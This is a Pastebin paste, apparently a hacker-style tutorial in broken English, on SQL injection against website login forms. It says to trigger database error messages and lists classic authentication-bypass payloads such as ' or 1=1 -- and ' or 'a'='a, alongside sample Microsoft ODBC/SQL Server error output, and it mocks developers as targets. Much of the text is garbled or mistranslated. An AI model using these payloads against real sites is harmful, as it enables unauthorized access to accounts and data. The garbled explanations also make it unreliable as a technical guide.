Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- welcome guys how are you ??
- thanks to those who continue with me here !!!
- now i will explain the new way of sql attacks
- we will depend on fatal errors or mistakes on
- web applications .... yeah suck developers
- who did not understand fully about sql injection
- LOOK....!!!!!!!!
- sql injection errors is very important... getting to the site
- will send you a ridiculous SQL query error message
- and he
- will give us a form.... we reviewed this error message
- and
- will try to find some clues from within.... for example, a
- site the user to input a user name and password
- section to
- section 'or 1 = 1 - let me say enter...... if the sql
- vulnerability on the site should give an error as follows:
- <!--[ If! SupportLineBreakNewLine] ->
- <!--[ Endif] ->
- Microsoft OLE DB Provider for ODBC Drivers error
- '80040e07 '
- [Microsoft] [ODBC SQL Server Driver] [SQL Server]
- Syntax
- error converting the nvarchar value 'users' to a column
- of
- data type int......... / Index.asp, line 11
- that's how we got an error..... if this error;
- Microsoft Database Drivers error '80040e07 '
- sql Server 'users' table did not enter a valid value for
- matching,...... syntax error has occurred.
- / Index.asp, line 11
- Does not end in SQL queries.
- 'Or 1 = 1 -
- "Or 1 = 1 -
- 'Or' a '=' a
- or 1 = 1 -
- ') Or (' a '=' a
- "Or" a "=" as a parameter can also be used.
- Above the user name and password section 'or 1 = 1 -
- to write
- because
- entry requirement is nothing you or 1 = 1 state get. (1 is
- always 1 to be equal because every time this command
- works)
- ^_________________*
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
